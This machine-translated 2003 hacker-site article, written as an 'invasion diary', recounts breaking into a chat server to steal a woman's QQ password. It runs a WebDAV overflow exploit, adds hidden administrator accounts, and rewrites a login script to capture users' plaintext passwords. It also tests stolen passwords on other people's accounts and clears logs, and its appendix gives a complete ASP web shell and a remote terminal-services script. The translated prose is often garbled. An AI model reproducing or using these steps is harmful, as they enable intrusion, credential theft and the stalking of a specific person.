52157.com network security technology alliance - original China hacker alliance ChinaHU hacker technology QQ robs the number OICQ password legend to rob the number hacker network technology to invade red guest wooden horse virus hacker alliance network security security technology NT Win2K Win2000 MCSE the Cisco router switchboard software programming password to explain the registration bomb
      Was visited 45,569 time








        Stand home page Technical digest Security loophole Procedure downloading 
      The home station serves Cool site link Technical forum


            Origin:Oorin0 renewal date: 2003-4-27 6:52:03 reading number of 
            times: 125

            An invasion diary piece


            Nick name:oorin0 (oo0o, Xrin0)
            Email:wt200@km169.net or oo0o@ynmail.com 
            QQ:33353290
            Reading crowd: Network security beginner
            An invasion diary piece
            Really does not know her now how, but takes the friend, or should 
            care about which sexual harasser on her QQ has: P, therefore the 
            decision robs her 
            QQ password Ha-ha. Good, now cuts into the subject, obtains the 
            password usual plan to have the following several kinds:
            1. The direct invasion leaps the news server (lunatic)
            2. In the internet bar peaceful wooden horse, deceives her to access 
            the net again, ha-ha...... (oh, resembles her to never have and me 
            alone together is crossing, obviously dislikes me: )
            As a result of average consumer's EMAIL.QQ. The chatroom password 
            (including rivers and lakes) mostly is same, or has the simple 
            distortion, but the chatroom, the rivers and lakes network compares
            The Tencent network is frail, therefore, also may have following 
            several kind of plans:
            3. W E B explains the mailbox password (she not to have mail...)
            4. The network deceit, installs the chatroom in own website, is 
            called her to access the net: ) (Was a pity I do not have website)
            5. Through to the chatroom as well as the rivers and lakes server 
            attack, obtains the goal the password
            Looked like the present has invades the website, the lock-on target 
            is only xajh.xxx.com
            C:\>Pinging xajh.xxx.com [ 192.168.0.1 ] with 32 bytes of da
            Reply from 192.168.0.1: Bytes=32 time=111ms TTL=125
            Reply from 192.168.0.1: Bytes=32 time=102ms TTL=125
            Reply from 192.168.0.1: Bytes=32 time=99ms TTL=125
            Reply from 192.168.0.1: Bytes=32 time=96ms TTL=125
            Ping statistics for 192.168.0.1:
            Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
            Approximate round trip times in milli-seconds:
            Minimum = 96ms, Maximum = 111ms, Average = 102ms
            // obtains opposite party IP is 192.168.0.1
            C:\>telnet 192.168.0.180
            GET [ Enter ]
            HTTP/1.1 400 Bad Request
            Server: Microsoft-IIS/5.0
            Date: Wed, 16 Apr 2,003 11:18:38 GMT
            Content-Type: Text/html
            Content-Length: 87
            <html><head><title>Error</title></head><body>The parameter is 
            incorrect. </body>
            </html>
            Has lost with the main engine connection.
            Originally is the Windows 2000, graciousness, tries the Webdavx 
            loophole, has gotten down Webdavx3.rar to www.xfocus.net which isno 
            writes
            //Server: The Microsoft-IIS/5.0 showing is windows 2,000 if is 5.1 
            is xp,4.0 is nt
            C:\>webdavx3 192.168.0.1
            IIS WebDAV overflow remote exploit by isno@xfocus.org
            Start to try offset,
            If STOP a long time, you can press ^C and telnet 192.168.0.17788
            Try offset: 0
            Try offset: 1
            Try offset: 2
            Try offset: 3
            Try offset: 4
            Try offset: 5
            Try offset: 6
            Try offset: 7
            Try offset: 8
            Try offset: 9
            Try offset: 10
            Try offset: 11
            Try offset: 12
            Try offset: 13
            Try offset: 14
            Try offset: 15
            Try offset: 16
            Try offset: 17
            Try offset: 18
            Try offset: 19
            Try offset: -1
            Try offset: -2
            Try offset: -3
            Waiting for iis restart....................... (IIS got up again in 
            here, and so on as soon as meets)
            Try offset: -4 
            // procedure moved to here stops has gotten down, again opened CMD,
            C:\>telnet 192.168.0.17788
            192.168.0.1: Inverse host lookup failed: H_errno 11004: NO_DATA
            (UNKNOWN) [ 192.168.0.1 ] 7,788 (?) Open
            Microsoft Windows 2,000 [ Version 5.00.2195 ]
            (C) all rights reserved 1985-2000 Microsoft Corp.
            C:\WINNT\system32>net user guest /active:y // activates the guest 
            account
            Orders successfully to complete.
            C:\WINNT\system32>net user guest password123 // establishes the 
            guest account password is password123
            Orders successfully to complete.
            C:\WINNT\system32>net localgroup administrators guest /add // adds 
            to the guest account the administrators group
            Orders successfully to complete.
            Had a look 3389 to open did not have
            C:\>telnet 192.168.0.13389
            GET [ Enter ]
            _ // saw the waiting symbol, showed
            Very good, with on the terminal service customer end continually 
            opposite party computer, opens "management tool" -> "computer 
            management" -> the "service and application procedure" the -> spot
            Strikes "Internet information service", discovered the system long 
            time has not responded..
            // may facilitate in here knows opposite party WEB procedure the 
            physical way
            C:\>telnet 192.168.0.180
            Is connecting to 192.168.0.1.. Cannot open to the main engine 
            connection, in port 80.
            Because the goal machine positive rejection, is unable to connect.
            // cannot connect 80 ports, after explained Webdavx overflows 
            successfully, caused IIS to die
            First no matter it, opens "to search", searches all to have "xajh 
            the" inscription the document
            // looks for the WEB procedure physics way another method, except 
            for this also has in the order line dir/s and so on
            Finally had found, the physical way is d:\www\xajh\ Found the rivers 
            and lakes the explanation document d:\www\xajh\ explanation document 
            txt, discovery rivers and lakes database
            For c:\www\xajh\h3cw\hc3w_xajh.asp, duplicates it is 
            d:\www\xajh\error.mdb.
            Returns to on own loom to download http://xajh.xxx.com/error.mdb, 
            opens as soon as looked, unexpectedly only has 1MB! ? Looked like 
            has reformed, reconnects
            192.168.0.1 terminals services, discovered 
            d:\www\xajh\h3cs\zjh595.asp this document has 13.6MB, should be it, 
            thereupon the duplication was
            D:\www\xajh\error1.mdb, then returns to on own loom to 
            downloadhttp://xajh.xxx.com/error1.mdb
            After downloads, should delete http://xajh.xxx.com/error.mdb and 
            http://xajh.xxx.com/error1.mdb immediately in order to avoid cause 
            the net
            Tube attention Opens as soon as looked that, unexpectedly has not 
            added the password for the access database, ha-ha.....! ! ! Again as 
            soon as looked, well, how all users' password all like this
            Complex ~, examined the d:\www\xajh\ explanation document txt knew 
            original it uses MD5 to encrypt (the present chatroom mostly like 
            this) Because the violence explains sleepiness
            Difficult, had thought uses the sniffer, but the sniffer can take 
            the massive band widths, or is easy to cause the experienced manager 
            to suspect, thereupon the decision uses WEB to bully
            Deceived, notes already causes IIS to die a moment ago, needed again 
            to open IIS. //
            C:\>net start w3svc
            The prompt because the unknown reason service cannot start
            Looked like only restarts the computer Here need considered restarts 
            latter,3389 whether can open (in the usual situation, IIS can 
            automatically start, but
            The terminal service possibly can close)
            Law one:
            Opens "control panel" -> "management tool" -> "to serve" 
            Found "Terminal Services" to double-click, changes "start type" 
            "automatic"
            Found "World Wide Web Publishing" to double-click, looked whether is 
            "automatic"
            If after is "automatic" opens the computer again, IIS and the 
            terminal service can automatically start
            Law two:
            Opens sharing, concrete please refer to iqst << an exhaustive IP 
            invasion material >>
            C:\>net share
            Has not started the Server service.
            Whether may start? (Y/N) [ Y ]: Y
            The Server service is starting.
            The Server service already started successfully.

            Shares the famous resources annotation
            -----------------------------------------------------
            IP long-distance IPC
            D$ D:\ tacitly approves sharing
            G$ G:\ tacitly approves sharing
            F$ F:\ tacitly approves sharing
            ADMIN$ D:\WINDOWS long-distance management
            C:\ tacitly approves sharing
            E$ E:\ tacitly approves sharing
            Opens the terminal service using the script, concrete please refer 
            to caozhe (grass is wise) << simple 3,389 invasions processes >>
            C:\>cscript rots.vbe 192.168.0.1 guest "password123" 3,389 /fr
            After waited for several minutes, the system opens again......
            Good, now returns to the subject, the goal is the rivers and lakes 
            password, but it has used the md5 encryption, therefore needs to use 
            the WEB deceit, thereupon first used access to construct
            The xajhlogo.mdb database table is "user password", some three 
            sections respectively are "user", "password", "oicq", then the 
            revision is xajhlogo.gif.
            On own loom opens a ftp service (to be possible to use tftp32) on 
            opposite party loom
            C:\>tftp -i 127.0.0.1 get xajhlogo.gif xajhlogo.gif //127.0.0.1 is 
            my IP
            Then duplicates c:\www\xajh\images\xajhlogo.gif // to reduce 
            possibly the danger coefficient which was suspected by the manager
            Then starts to begin to revise procedure d:\www\xajh\check.asp this 
            document for this edition rivers and lakes verification document I 
            revise after the content to be as follows
            .........
            Name=Trim (Request ("name"))
            Password=Trim (Request ("pass"))
            Above is originally some
            .........
            Set conn=Server.CreateObject ("ADODB.CONNECTION")
            Set rs=Server.CreateObject ("ADODB.RecordSet")
            Conn.open Application ("sjjh_usermdb")
            Password1=md5 (password)
            Sql= "SELECT * FROM user WHERE name =" &name& ""
            Rs.open sql, conn,,2,2
            If rs.Eof and rs.Bof then
            Rs.close
            Set rs=nothing
            Conn.close
            Set conn=nothing
            Response.Redirect "error.asp? Id=423 "
            Response.end
            End if
            If rs ("password") password1 then
            Rs.close
            Set rs=nothing
            Conn.close
            Set conn=nothing
            Response.Redirect "error.asp? Id=141 "
            Response.end
            End if
            This section actually was I revises the original rivers and lakes 
            procedure directly to stick in here, after lazy ~ only needed to 
            note here to have to use "password1" otherwise
            Surface password confirmation time will become password=md5 (md5 
            (password)), has like this made a mistake
            Useroicq=rs ("oicq")
            Rs.close
            Set rs=nothing
            Conn.close
            Set conn=nothing
            Set conn=Server.CreateObject ("ADODB.Connection")
            DBPath=Server.MapPath ("images/xajhlogo.gif")
            Set rs=Server.CreateObject ("ADODB.RecordSet")
            Conn.Open "driver= {Microsoft Access Driver (* mdb)}; Dbq= "& DBPath
            Rs.open "SELECT * FROM user password WHERE user =" & name & "", conn
            If not (Rs.Bof OR Rs.Eof) Then
            Sql= "Update user password Set password =" & password & "" & "where 
            user =" & name & ""
            Conn.Execute sql
            Rs.close
            Set rs=nothing
            Conn.close
            Set conn=nothing 
            Else
            Sql= "Insert Into user password (user, password, oicq) Values ("
            Sql=sql & "" & name & "" & ","
            Sql=sql & "" & password & "" & ","
            Sql=sql & "" & useroicq & "" &")"
            Conn.Execute sql
            Rs.close
            Set rs=nothing
            Conn.close
            Set conn=nothing
            End if
            .............
            Above me adds the procedure all is operates in front of the rivers 
            and lakes database in opposite party, like this is for prevent when 
            concurrent operation two databases makes a mistake
            Under is the opposite party first section starts to operate the 
            database the procedure
            Because everybody is the vegetable bird, therefore a wise remark is, 
            first tested on the oneself loom well, then passed on! ! !
            Set conn=Server.CreateObject ("ADODB.CONNECTION")
            Set rs=Server.CreateObject ("ADODB.RecordSet")
            Conn.open Application ("sjjh_usermdb")
            .........
            To this, the long waiting started............
            After 15 magical skills study write cross
            .........
            Now the exciting time arrived, downloads 
            http://xajh.xxx.com/images/xajhlogo.gif.
            After changes 1.mdb to open.......... Had found her ----- *** 
            password, ha ha, her password really with QQ password same ^O^
            After the test (first 100 passwords, really have 1,237 users 
            passwords), unexpectedly some 5 individual QQ password and the 
            rivers and lakes password are same (as a result of user's QQ number 
            possibility
            Is randomly fills in, therefore are possibly more, the best means, 
            chat with them ask the QQ number: D), to the QQ password value 
            degree looked like is not very big, estimated also does not have
            Has the application password protection, tries, some 2 individual 
            have not applied, ha-ha........ Happy: )
            To this, both happy and sad, took pleasure to glad that I to obtain 
            her password, sad was has the N many Internets user the value degree 
            or the password is peaceful to the password
            The entire consciousness weak (has password very complex, but the QQ 
            password and chatroom password were still same), fortunately, I love 
            Q crazy ^-^
            Good, now is the back door, peaceful cmd.asp to 
            d:\www\xajh\images\config.asp.
            The code sees the appendix, may carry out the WEB order through 
            http://xajh.xxx.com/images/config.asp

            Everybody certainly notes me not to use the clone the manager 
            account number, is because the manager account which because clones 
            has all used same profiles, therefore
            If you not carefully kept the any recording (for instance some 
            people to like moving that dozen order), such could be very easy to 
            cause the manager to discover Therefore cautious uses the gram
            Prosperous manager account number, but or should establish a 
            hideaway the manager account number to take the back door
            First establishes the InternetUser$ user
            C:\>net user InternetUser$ password123 /add
            Behind // adds $ is for cause uses net user blind under the control 
            bench
            Then moves regedt32.exe (attention is not regedit.exe)
            First found HKEY_LOCAL_MAICHINE\SAM\SAM to click on it, then 
            increases the account or the group in menu "security" -> 
            "jurisdiction" which the oneself present registers,
            Completely controls "->" "jurisdiction" -> "to allow" to get 
            cancels, then determination
            (For instance we used guest to register a moment ago, but it already 
            was the administrators group, therefore needed also to change the 
            ADMINISTRATORS group the permission
            Completely controls, moreover the under key, Domains, account, user 
            all must chase the level to do this But if front has not changed the 
            guest user to tacitly approve the group, this
            In such has not troubled on the necessity, &#32423;&#32423;) has like this been 
            allowed straight to respectfully received and read takes local sam 
            the information
            Now moves regedit.exe
            Opens key 
            HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\InternetUser$
            The examination tacitly approves the key value is "0x3f1" 
            correspondingly derives as follows
            HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\ASPNET$ is 
            InternetUser$ reg
            HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1 is 3f1.reg
            HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 is lf4.reg 
            (the Administrators corresponding key)
            Opens lf4.reg with the memorandum to find following "F" the value, 
            for instance in this example is as follows

            "F" 
            =hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00, 
            \
            00,20,97, b7,13,99,50, c2,01, ff, ff, ff, ff, ff, ff, 
            ff,7f,40,6e,43,73,9f,50, c2,01, \
            F4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00, 
            \
            00,00,00,00,00,00,00
            After its duplication, opens 3f1.reg, found "F" the value, its 
            deletion, then glues above that section
            Opens aspnet$ reg, inside content, for instance in this example like 
            under this section of duplication
            [ 
            HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\InternetUser$ 
            ]
            @=hex (3f1):
            Above returns to 3f1.reg to glue this section to the document final, 
            finally produces the document content is as follows
            Windows Registry Editor Version 5.00
            [ HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1 ]
            "F" 
            =hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00, 
            \
            00,20,97, b7,13,99,50, c2,01, ff, ff, ff, ff, ff, ff, 
            ff,7f,40,6e,43,73,9f,50, c2,01, \
            F4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00, 
            \
            00,00,00,00,00,00,00
            "V" =hex:00,00,00,00, d4,00,00,00,02,00,01,00, 
            d4,00,00,00,1a,00,00,00,00,00,00, \
            00, 
            f0,00,00,00,10,00,00,00,00,00,00,00,00,01,00,00,12,00,00,00,00,00,00,00, 
            \
            14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14, 
            \
            01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01, 
            \
            00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,00, 
            \
            00,00,00,00,00,00,00,00,00,14,01,00,00,15,00,00,00, 
            a8,00,00,00,2c,01,00,00, \
            08,00,00,00,01,00,00,00,34,01,00,00,14,00,00,00,00,00,00,00,48,01,00,00,14, 
            \
            00,00,00,00,00,00,00,5c,01,00,00,04,00,00,00,00,00,00,00,60,01,00,00,04,00, 
            \
            00,00,00,00,00,00,01,00,14,80, b4,00,00,00, 
            c4,00,00,00,14,00,00,00,44,00,00, \
            00,02,00,30,00,02,00,00,00,02, 
            c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01, \
            00,00,00,00,02, c0,14,00, 
            ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02, \
            00,70,00,04,00,00,00,00,00,14,00,1b,03,02,00,01,01,00,00,00,00,00,01,00,00, 
            \
            00,00,00,00,18,00, 
            ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00, \
            00,00,00,18,00, 
            ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00, \
            00,00,24,00,04,00,02,00,01,05,00,00,00,00,00,05,15,00,00,00, b4, b7, 
            cd,22, dd, \
            E8, e4,1c, be,04,3e,32, 
            e8,03,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02, \
            00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,48,00,65,00,6c,00,70, 
            \
            00,41,00,73,00,73,00,69,00,73,00,74,00,61,00,6e,00,74,00,00,00, 
            dc,8f,0b,7a, \
            4c,68,62,97, a9,52,4b,62,10,5e,37,62, d0,63,9b,4f, 
            dc,8f,0b,7a,4f,53, a9,52,84, \
            76,10,5e,37,62,01,00, ff, ff, ff, ff, ff, ff, ff, ff, ff, ff, ff, 
            ff, ff, ff, ff, ff, ff, ff, \
            Ff, ff, ff,88, d7, f1,01,02,00,00,07,00,00,00,01,00,01,00, db,57, 
            a2,94, f8,41,63, \
            Fa,2c,88, d7, f1, cd,99, cf,0d,01,00,01,00, a0,05,70,54, 
            f3,45,3e,4a,64,95, ef,6c, \
            37, f1,02, cf,01,00,01,00,01,00,01,00

            [ 
            HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\InternetUser$ 
            ]
            @=hex (3f1):
            After preservation, InternetUser$ user deletion
            C:\>net user InternetUser$ /delete
            Moves regedit.exe the 3f1.reg document which already revised us to 
            induct
            Finally, opens regedt32.exe to find HKEY_LOCAL_MAICHINE\SAM\SAM to 
            click on it, then in menu "security" -> "jurisdiction" deletion a 
            moment ago
            The increase user (for instance a moment ago was guest a moment ago 
            which uses, moreover changed the Administrators group's 
            establishment, therefore corresponds with front, Administratos
            The group also must change, moreover under the SAM key, Domains, 
            account, user all must chase the level to do this, but if front has 
            not changed the guest user to tacitly approve the group,
            Here necessity such has not troubled, &#32423;&#32423;).
            Thus, we have established in the control bench with net user and "in 
            computer management" all blind account InternetUser$, but cannot 
            change
            Password, as soon as changes the password to be able to see in "in 
            computer management" Needs to pay attention is, each time registers 
            (no matter is clone), all best cancels,
            But is not the direct closure window, otherwise can see in "in 
            terminal service management", after when the manager registers 
            cancels, possibly can discover a question is
            How can be "cancels InternetUser$..." ! ! (I have cloned two account 
            numbers, test, has not tested Administrators)
            Then records the cleaning up, because the entire process has 
            downloading the process by the record, therefore, moves logfiles, 
            deletes in the related document the recording then
            Myself level too bad, certainly has the mistake and the omission 
            place, this article all changed N, therefore looks the master to 
            criticize points out mistakes

            Appendix:
            --------------------------------------------------
            Below is the asp back door, saves is cmd.asp
            <%@ Language=VBScript %>
            <%
            Dim oScript
            Dim oScriptNet
            Dim oFileSys, oFile
            Dim szCMD, szTempFile
            On Error Resume Next
            -- create the COM objects that we will be using -- 
            Set oScript = Server.CreateObject ("WSCRIPT.SHELL")
            Set oScriptNet = Server.CreateObject ("WSCRIPT.NETWORK")
            Set oFileSys = Server.CreateObject ("Scripting.FileSystemObject")
            -- check for a command that we have posted -- 
            SzCMD = Request.Form ("CMD")
            If (szCMD "") Then
            -- Use a poor mans pipe... a temp file -- 
            SzTempFile = "C:\" & oFileSys.GetTempName ()
            Call oScript.Run ("cmd.exe /c" & szCMD & ">" & szTempFile, 0, True)
            Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
            End If
            %>
            <HTML>
            <BODY>
            <FORM action= "<%= Request.ServerVariables ("URL") %>" method= 
            "POST" >
            <input type=text name= "CMD" size=45 value= "<%= szCMD %>" >
            <input type=submit value= "Run" >
            </FORM>
            <PRE>
            <%
            If (IsObject (oFile)) Then
            -- Read the output from our command and remove the temp file -- 
            On Error Resume Next
            Response.Write Server.HTMLEncode (oFile.ReadAll)
            OFile.Close
            Call oFileSys.DeleteFile (szTempFile, True)
            End If
            %>
            </BODY>
            </HTML>
            ----------------------------------------------------------------------
            Below is opens the terminal the script, directs (grass is wise) from 
            caozhe << simple 3,389 invasions processes >>, saves it is rots.vbe
            On error resume next
            Set outstreem=wscript.stdout
            Set instreem=wscript.stdin
            If (lcase (right (wscript.fullname,11)) = "wscript.exe") then
            Set objShell=wscript.createObject ("wscript.shell")
            ObjShell.Run ("cmd.exe /k cscript //nologo" &chr (34) 
            &wscript.scriptfullname&chr (34))
            Wscript.quit
            End if
            If wscript.arguments.count<3 then
            Usage ()
            Wscript.echo "Not enough parameters."
            Wscript.quit
            End if
            Ipaddress=wscript.arguments (0)
            Username=wscript.arguments (1)
            Password=wscript.arguments (2)
            If wscript.arguments.count>3 then
            Port=wscript.arguments (3)
            Else
            Port=3389
            End if
            If not isnumeric (port) or port<1 or port>65000 then
            Wscript.echo "The number of port is error."
            Wscript.quit
            End if
            If wscript.arguments.count>4 then
            Reboot=wscript.arguments (4)
            Else
            Reboot= ""
            End if
            Usage ()
            Outstreem.write "Conneting" &ipaddress& "...."
            Set objlocator=createobject ("wbemscripting.swbemlocator")
            Set objswbemservices=objlocator.connectserver (ipaddress, 
            "root/cimv2", username, password)
            Showerror (err.number)
            Objswbemservices.security_ privileges.add 23, true
            Objswbemservices.security_ privileges.add 18, true
            Outstreem.write "Checking OS type...."
            Set colinstoscaption=objswbemservices.execquery ("select caption 
            from win32_operatingsystem")
            For each objinstoscaption in colinstoscaption
            If instr (objinstoscaption.caption, "Server") >0 then
            Wscript.echo "OK!"
            Else
            Wscript.echo "OS type is" &objinstoscaption.caption
            Outstreem.write "Do you want to cancel setup? [ y/n ] "
            Strcancel=instreem.readline
            If lcase (strcancel) "n" then wscript.quit
            End if
            Next
            Outstreem.write "Writing into registry...."
            Set objinstreg=objlocator.connectserver (ipaddress, "root/default", 
            username, password) get
            ("stdregprov")
            HKLM=&h80000002
            HKU=&h80000003
            With objinstreg
            Createkey, "SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
            Setdwordvalue HKLM, 
            "SOFTWARE\Microsoft\Windows\CurrentVersion\netcache", "Enabled",0
            Createkey HKLM, "SOFTWARE\Policies\Microsoft\Windows\Installer"
            Setdwordvalue HKLM, "SOFTWARE\Policies\Microsoft\Windows\Installer", 
            "EnableAdminTSRemote",1
            Setdwordvalue HKLM, "SYSTEM\CurrentControlSet\Control\Terminal 
            Server", "TSEnabled",1
            Setdwordvalue HKLM, "SYSTEM\CurrentControlSet\Services\TermDD", 
            "Start",2
            Setdwordvalue HKLM, "SYSTEM\CurrentControlSet\Services\TermService", 
            "Start",2
            Setstringvalue HKU, "DEFAULT\Keyboard Layout\Toggle", "Hotkey", "1"
            Setdwordvalue HKLM, "SYSTEM\CurrentControlSet\Control\Terminal 
            Server\WinStations\RDP-
            Tcp "," PortNumber ", port
            End with
            Showerror (err.number)
            Rebt=lcase (reboot)
            Flag=0
            If rebt= "/r" or rebt= "-r" or rebt= "\r" then flag=2
            If rebt= "/fr" or rebt= "-fr" or rebt= "\fr" then flag=6
            If flag0 then
            Outstreem.write "Now, reboot target...."
            Strwqlquery= "select * from win32_operatingsystem where 
primary=true"
            Set colinstances=objswbemservices.execquery (strwqlquery)
            For each objinstance in colinstances
            Objinstance.win32shutdown (flag)
            Next
            Showerror (err.number)
            Else
            Wscript.echo "You need to reboot target." Vbcrlf& "Then,"
            End if
            Wscript.echo "You can logon terminal services on" &port& "later. 
            Good luck!"
            Function showerror (errornumber)
            If errornumber Then
            Wscript.echo "Error 0x" &cstr (hex (err.number)) & "."
            If err.description "" then
            Wscript.echo "Error description: "&err.description&"."
            End if
            Wscript.quit
            Else
            Wscript.echo "OK!"
            End if
            End function
            Function usage ()
            Wscript.echo string (79, "*")
            Wscript.echo "ROTS v1.05"
            Wscript.echo "Remote Open Terminal services Script, by grass wise"
            Wscript.echo "Welcome to visite www.5458.net"
            Wscript.echo "Usage:"
            Wscript.echo "cscript" &wscript.scriptfullname& "targetIP username 
            password [ port ] [ /r|/fr ]"
            Wscript.echo "port: Default number is 3389. "
            Wscript.echo "/r: Auto reboot target. "
            Wscript.echo "/fr: Auto force reboot target. "
            Wscript.echo string (79, "*") &vbcrlf
            End function

            Root note: This article says regarding the network security 
            beginner, perhaps can have the help, although uses the method quite 
            is simple, but is helpful to understood aggressor's mentality and 
            the method flow, certainly, are not encourages everybody such to do: 
            ) 

            --------------------------------------------------------------------------------
            Related news
            Conversation the non- mainstream invasion kidnaps winnt/2k HASH 
            2003-4-27 6:51:18
            The hacker avoids the examination the method 2003-4-22 14:12:44
            Changes to the SQL database from IIS to be safe 2003-4-20 14:52:22
            After the UNIX system attacks and captures 2003-4-14 11:53:33
            Rootkit summarizes 2003-4-3 16:20:55
            The asp back door demonstrates 2003-4-1 12:49:28
            Time penetrates SNIFF to have the goal invasion 2003-3-31 15:25:51
            So long as is the procedure has BUG! Guards against stops up the 
            hacker to attack center of percussion the law 2003-3-28 15:30:26
            The NT loophole summarizes and uses 2003-3-26 22:26:00
            TCP/IP security 2003-3-25 16:43:38
            A part of Win2000 invasion method 2003-3-25 16:14:07
            Promotes the jurisdiction using Windows 2,000 center Dynamic Data 
            Exchange 2003-3-25 16:05:45
            Win2000 the Server invasion monitors 2003-3-25 16:03:03
            Whether invades in the internet bar the computer analysis 2003-3-25 
            13:10:45
            Yahoo website DDOS invasion technique introduction (chart article) 
            2003-3-25 13:00:16
            The vegetable bird crosses the threshold the intensive course - 
            popular loophole to invade 2003-3-25 12:58:23
            Promotes the jurisdiction in W2K several attacks success or failure 
            of attainment examples 2003-3-24 10:21:29
            The vegetable bird (encrypts the socks5 proxy) with the agent some 
            straightforward procedures 2003-3-23 13:33:30
            Explains the email 2003-3-23 13:15:37
            Passes security --Win98 ultimate guards against 2003-3-23 13:06:58
            Invades using frontpage 2003-3-20 13:20:38
            Microsoft Windows 2,000 WebDAV long-distance buffer overflow 
            loophole 2003-3-20 13:02:57
            The port scanning analyzes 2003-3-20 11:50:26
            How breaks through each kind of firewall the protection 2003-3-18 
            23:56:54
            An exhaustive IP invasion material 2003-3-18 23:53:06
            The UNICODE code loophole all captures -4 2003-3-18 23:43:28
            Shallowly discussed Linux the security establishes 2003-3-16 
17:50:02
            Invades from 98 sharing to completely controls 2003-3-15 22:40:10
            The hacker invades the old tricks 2003-3-14 17:31:28
            Windows2000 safe establishment complete handbook 2003-3-14 11:19:43
            Looks at the hypothesized main engine system by an invasion example 
            the security problem 2003-3-13 21:41:44
            Looks at the IDS network detector from the ruleset the examination 
            ability 2003-3-13 17:41:55
            Unicode loophole attack method and protection strategy 2003-3-12 
            15:59:30
            How the switchboard and do the router safely teach you six big 
            principles 2003-3-12 15:51:15
            Six year systems medicines student four month-long study the hacker 
            experiences 2003-3-12 11:34:41
            Future the electronic warfare, China will win the probability will 
            have in a big way 2003-3-10 9:18:35
            How safeguards the wireless local area network deposit and 
            withdrawal to be safe 2003-3-10 9:12:01
            Has given own how with the hacker move network to garrison 2003-3-10 
            9:09:28
            Perfectly explains 2003-3-10 8:53:22
            About thunder arrogant forum loophole! 2003-3-7 10:13:52
            From programs to invades 2003-3-7 10:11:59
            Simple 3,389 invasions processes 2003-3-7 10:07:59
            The loophole starts which from SATAN collects (next) 2003-3-7 
            10:01:23
            Collection starts which from SATAN (on) 2003-3-7 9:59:44
            The ambush tacitly approves in the establishment in Windows the trap 
            2003-2-16 15:30:53
            Port foundation general knowledge greatly entire 2003-2-16 15:29:31
            Constructs the Windows 2,000 servers the security protective forests 
            2003-2-16 15:28:01
            The domestic hacker relates the method! 2003-2-12 21:19:28
            "is classical" the invasion examination -- finds out the hacker 
            2003-2-9 9:29:29
            The network attack mechanism and the technological development 
            summarize 2003-2-9 9:28:24
            How traces the intruder 2003-1-22 8:57:23
            Intimate contact long-distance control (7) 2003-1-22 8:55:37
            Teaches you after mail virus invasion five elimination step 
            2003-1-22 8:52:33
            Sniffer some materials 2003-1-22 8:51:55
            Chat Windows security 2003-1-22 8:50:58
            The security deletes the Guest account number 2003-1-22 3:19:30
            In 2002 the Internet you cannot not be known eight large network 
            securities event 2003-1-18 16:55:59
            Analyzes each kind of malicious homepage and the IE loophole 
            countermeasure analyzes 2003-1-14 16:16:50
            Common port detailed solution and partial attacks strategy 2003-1-13 
            12:04:09
            The overseas hacker resources (absolutely is worth looking) 
            2003-1-10 8:44:00
            The hacker camouflages oneself, avoids the examination commonly used 
            method briefly to introduce 2003-1-10 8:42:13
            The cross station script shows 2003-1-10 2:00:02
            The hacker camouflages oneself, avoids the examination commonly used 
            method briefly to introduce 2003-1-10 1:59:23
            Unix invasion and defense attainment (1) 2003-1-7 12:29:31
            The new method invades win9x and win2k 2003-1-7 12:28:01
            The hacker hand records - invades the American outer space head 
            office to move 2002-12-24 1:59:18
            Goal main engine operating system recognition technology 2002-12-24 
            1:54:31
            How SNIFFER (did sniffer) - discover and prevents Sniffer 2002-12-24 
            1:53:19
            SNIFFER (sniffer) - introduces 2002-12-24 1:52:28
            NT each loophole advantage usage 2002-12-24 1:52:05
            Network invasion method and general step 2002-12-24 1:51:24
            The general invasion needs several commonly used order 2002-12-24 
            1:49:57
            Network monitor examination 2002-12-24 1:49:31
            Network monitor goal 2002-12-24 1:49:11
            How uses "the network demon" to invade! 2002-12-24 1:47:23
            How after enters the system to hide oneself? 2002-12-24 1:46:17
            The vegetable bird XXX guest fast crosses the threshold 2002-12-24 
            1:45:49
            The Unix hacker beginner instructs 2002-12-24 1:45:17
            Teaches you first time to invade 2002-12-24 1:43:21
            The hacker attacks the tune 2002-12-24 1:41:40
            The *NIX invasion traces 2002-12-24 1:16:23
            Dissection security account number management (SAM) structure 
            2002-12-24 1:14:31
            The unix system virus outlines 2002-12-24 1:12:21
            TCP/IP security 2002-12-24 1:10:37
            Win2000 Server invasion monitor [ two ] 2002-12-24 1:08:57
            Win2000 the Server invasion monitors 2002-12-24 1:05:18


            Most recent 10 news
            On time ˽ arrangement
            On time rises the foreword arrangement




      Site Program By 52157.com & Interface Design By Dahua
      Internet Explorer V5.5 or higher & 1042@768 For the Best view 
      Html&ASP-52157.com- Ver1.0 Copyright 2002. All rights reserved.
      Processed:691.406 ms


